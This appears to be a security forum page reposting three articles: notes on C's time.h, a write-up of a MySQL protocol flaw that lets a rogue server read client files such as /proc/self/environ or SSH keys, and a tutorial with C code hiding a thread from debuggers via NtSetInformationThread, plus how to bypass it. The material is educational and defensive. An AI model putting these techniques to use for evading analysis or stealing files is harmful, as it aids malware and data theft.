...; Those are the notes I wanted to share for this header. Also C99 introduces wide character versions of these functions in wchar.h. time.h First, the C standard is very lenient about this header. It has functions to do all kinds of conversions, but the bigger picture is that implementations are allowed to make their “best approximation” to the date and time. Some of them might do a bad job and yet still conform to the standard. Many C environments do not support the concepts of daylight savings or time zones. Both notions are defined geographically and politically, and thus may require more knowledge about the real world than an implementation can support. There are a lot of details in this header that I don’t want to regurgitate, but it is useful to see how the functions convert between the data types. I made a graph to make it clearer. One thing I didn’t know was that the header provides a clock() function to measure the CPU time elapsed since program start. Also that it provides a resolution of CLOCKS_PER_SEC which is often higher than one. The rest of the library is limited to nothing smaller than seconds of precision. Sursa: https://begriffs.com/posts/2019-01-19-inside-c-standard-lib.html
  23. MySQL client allows MySQL server to request any local file Sunday January 20, 2019 in Security, Magecart This week I discovered that large ecommerce and government sites got hacked via the Adminer database tool. As it turns out, the root cause is a protocol flaw in MySQL. Curiously, it is described in the official documentation, that says: The transfer of the file from the client host to the server host is initiated by the MySQL server. In theory, a patched server could be built that would tell the client program to transfer a file of the server’s choosing rather than the file named by the client in the LOAD DATA statement. Such a server could access any file on the client host to which the client user has read access. (A patched server could in fact reply with a file-transfer request to any statement, not just LOAD DATA LOCAL, so a more fundamental issue is that clients should not connect to untrusted servers.) “In theory”? An Evil Mysql Server which does exactly that can be found on Github, and was likely used to exfiltrate passwords from these hacked sites. And could be used to steal SSH keys and crypto wallets, as interfail points out. The server has to know the full path of the file on the client for it to succeed. However, by first requesting /proc/self/environ, the server can learn a great deal about the folder structure on the client. Several clients and libraries have built-in protection for this “feature”, or disable it by default (eg Golang, Python, PHP-PDO). But not all, as the Adminer case demonstrates. And Adminer probably won’t be the last. Discuss this topic on Twitter and Reddit. Yours truly: digital forensics consultant, tracking payment skimmers since 2015. I am also the founder of the e-commerce malware scanner and Magereport. If you are breached and need a solid cleanup & root cause analysis, do get in touch. Sursa: https://gwillem.gitlab.io/2019/01/20/sites-hacked-via-mysql-protocal-flaw/
  24. Anti Debugging Tricks #4 – Hidden Threads timb3r - reverse engineering January 19, 2019No Comments ANTIDEBUG CRASH HIDE FROM DEBUGGER NTSETINFORMATIONTHREAD THREADS Has this ever happened to you? You’re playing around with some application and and it crashes the moment you attach a debugger? Ever wondered why or how? I do. These types of questions keep me awake at night. I first became aware of this technique while cruising around some forums on the internet. People typically asking for a bypass or a method to work around it. But I was more interested in HOW this technique works less interested in how to bypass. During my research phase I noticed that after the application crashed out it would crash out with: Unhandled exception code 80000003 But that’s an int 3 exception? How is the Debugger not catching that? What the actual hell. Searching around for information I discovered that NtSetInformationThread has a parameter called THREADINFOCLASS. Which contains this interesting snippet: ThreadHideFromDebugger = 0x11 Why Hans? You may be wondering why this is even a ‘feature’ of Windows? Wouldn’t malware abuse the hell out of this? Yes, probably. But here’s why it exists: When you attach a debugger to a remote process a new thread is created. If this was just a normal thread the debugger would be caught in an endless loop as it attempted to stop it’s own execution. So behind the scenes when the debugging thread is created Windows calls NtSetInformationThread with the ThreadHideFromDebugger flag set (1). This way the process can be debugged and a deadlock prevented. Allowing code execution to continue as normal. However, now that this thread is hidden from the debugger any breakpoints or exceptions that are triggered will cause the process to crash. Due to the fact that the debugger cannot see this thread it’s now unable to trap these events. So as it turned out some devious individual noticed this odd behaviour and thought: “this would make a really cool anti-debug feature”. Now we’re here with this method widespread enough for me to be aware of it. Das Kode So what’s it actually look like in code? I wasn’t able find any live examples so I constructed my own based on how I thought it should work: 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 #include <stdio.h> #include <windows.h> enum THREADINFOCLASS { ThreadHideFromDebugger = 0x11 }; typedef NTSTATUS (WINAPI *NtQueryInformationThread_t)(HANDLE, THREADINFOCLASS, PVOID, ULONG, PULONG); typedef NTSTATUS (WINAPI *NtSetInformationThread_t)(HANDLE, THREADINFOCLASS, PVOID, ULONG); NtQueryInformationThread_t fnNtQueryInformationThread = NULL; NtSetInformationThread_t fnNtSetInformationThread = NULL; DWORD WINAPI ThreadMain(LPVOID p) { while(1) { // This can be any trigger we're using this demo purposes if(IsDebuggerPresent()) // For MingW replace with __asm { int 3; } on MSVC asm("int3"); Sleep(500); } return 0; } int main(void) { DWORD dwThreadId = 0; HANDLE hThread = CreateThread(NULL, 0, ThreadMain, NULL, 0, &amp;dwThreadId); HMODULE hDLL = LoadLibrary("ntdll.dll"); if(!hDLL) return -1; fnNtQueryInformationThread = (NtQueryInformationThread_t)GetProcAddress(hDLL, "NtQueryInformationThread"); fnNtSetInformationThread = (NtSetInformationThread_t)GetProcAddress(hDLL, "NtSetInformationThread"); if(!fnNtQueryInformationThread || !fnNtSetInformationThread) return -1; ULONG lHideThread = 1, lRet = 0; fnNtSetInformationThread(hThread, ThreadHideFromDebugger, &amp;lHideThread, sizeof(lHideThread)); fnNtQueryInformationThread(hThread, ThreadHideFromDebugger, &amp;lHideThread, sizeof(lHideThread), &amp;lRet); printf("Thread is hidden: %s\n", val ? "Yes" : "No"); WaitForSingleObject(hThread, INFINITE); return 0; } Pretty simple yes? Now if you run the program and attempt to attach a debugger you’ll get this interesting crash: 0036:err:seh:raise_exception Unhandled exception code 80000003 flags 0 addr 0x401566 Oh ho ho! Poor Tony Throwing Hans off Nakatomi Well now we’ve established how this works we can look at beating it. There’s a number of ways including: Hooking the required Nt Function calls. Replacing the int 3 instruction with a nop. Nopping or hooking the “trigger” function. I opted for nopping out int 3: You can use your tool of choice to locate the required int 3 instruction: You’ll have to search around a bit Here’s our thread with the check Now we can nop that sucka out Attaching a debugger and resuming execution will result in everything working as expected. Bye Hans Ho-ho-ho One Time Donation: BTC 1DXcjix3FmcHYezFAjCrpzZA9FkbSC971e Paypal PayPal.me/timb3r Monthly Donation: Patreon Sursa: https://gamephreakers.com/2019/01/anti-debugging-tricks-4-hidden-threads/
×
×
  • Create New...